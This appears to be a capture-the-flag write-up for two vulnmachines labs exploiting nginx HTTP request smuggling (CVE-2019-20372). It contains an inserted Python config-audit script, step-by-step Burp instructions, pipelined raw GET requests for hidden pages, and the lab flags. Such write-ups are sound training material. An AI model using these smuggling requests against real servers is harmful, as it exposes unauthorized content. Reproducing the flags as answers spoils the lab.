HTTP Request Smuggling write-up vulnmachines
What is HTTP Request Smuggling?
Nginx HTTP request smuggling: CVE-2019-20372
Nginx before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where Nginx is being fronted by a load balancer.
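The check below is an added example, not part of the original write-up or the lab. It audits an nginx version banner and configuration for the combination the CVE text describes, assuming the affected form is an error_page that redirects to an absolute URL (the behaviour the nginx 1.17.7 changelog names). SAMPLE_CONF and all function names are constructed for illustration.

```python
import re

FIXED_IN = (1, 17, 7)  # from the advisory text: "Nginx before 1.17.7"
ERROR_PAGE = re.compile(r"^\s*error_page\s+([^;]+);", re.MULTILINE)

# Constructed sample configuration (not taken from the lab servers).
SAMPLE_CONF = """
server {
    listen 80;
    server_name localhost;
    error_page 401 http://example.org;    # redirect form
    error_page 500 502 =200 /50x.html;    # internal URI
    # error_page 403 http://commented.example;
    location / { return 401; }
}
"""


def parse_version(banner):
    """Extract (major, minor, patch) from 'nginx/1.16.1' style strings."""
    m = re.search(r"nginx/(\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("no nginx version in %r" % banner)
    return tuple(int(x) for x in m.groups())


def redirecting_error_pages(conf):
    """Return (codes, target) for each error_page whose target is an absolute URL."""
    text = re.sub(r"#.*", "", conf)  # drop comments (simplified: no '#' in quotes)
    findings = []
    for m in ERROR_PAGE.finditer(text):
        args = m.group(1).split()
        target = args[-1].strip("'\"")
        codes = [a for a in args[:-1] if a.isdigit()]  # skips optional '=code'
        if re.match(r"https?://", target, re.IGNORECASE):
            findings.append((codes, target))
    return findings


def audit(banner, conf):
    """Exposed only when both conditions hold: old version and redirect form."""
    version = parse_version(banner)
    hits = redirecting_error_pages(conf)
    return {"version": version, "redirects": hits,
            "exposed": version < FIXED_IN and bool(hits)}


if __name__ == "__main__":
    print(audit("nginx/1.16.1", SAMPLE_CONF))
```

Treat the version comparison as a first-pass signal only: distribution packages can carry a backported fix under an older version string.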
Question:
Capture the flag leveraging the HTTP Request Smuggling vulnerability.
Challenge 1: HTTP Request Smuggling Lab.
Challenge 2: Inside Hacker Lab.
Solution:
Step 1: Visit vulnmachines.com
Step 2: Go to Mission -> Game -> Mission. Select ‘HTTP Request Smuggling’.
Step 3: You will be redirected to http://example.org.
Step 4: As per the hint given, capture the first request (hackme3.vulnmachines.com:9015) in Burp.
Capture the request in Burp and view the response.
Step 5: The response redirects to example.org, as mentioned in the hint: (See hidden configuration in the _hidden folder).
Change the Connection header to keep-alive:
GET /index.html HTTP/1.1
Host: vnmlocalhost
Step 6: As per the hint, request the file /__hidden/index.html in the same request.
GET /__hidden/index.html HTTP/1.1
Host: vnmlocalhost
GET /_hidden/index.html HTTP/1.1
Host: nolocalhost
Flag: vnm{Hidden Data Exposed Successfully!}
Challenge 2: HTTP Request Smuggling Challenge: ‘Inside Hacker’
Step 1: Click on Lab Access.
Step 2: You will be redirected to https://www.twitter.com/vulnmachines.
Step 3: As per the hint given, capture the first request (http://13.127.193.78:9015/) in Burp.
Capture the request in Burp and view the response.
Step 4: The response redirects to twitter.com/vulnmachines, as mentioned in the hint: (See hidden configuration in the _hidden folder).
Change the Connection header to keep-alive:
GET /index.html HTTP/1.1
Host: vnmlocalhost
Step 5: As per the hint, request the file /__hidden/index.html in the same request.
GET /_hidden/index.html HTTP/1.1
Host: vnmlocalhost
Flag: vnm{BuT W3 Are HaCkers YoU and You Are ExpoSed}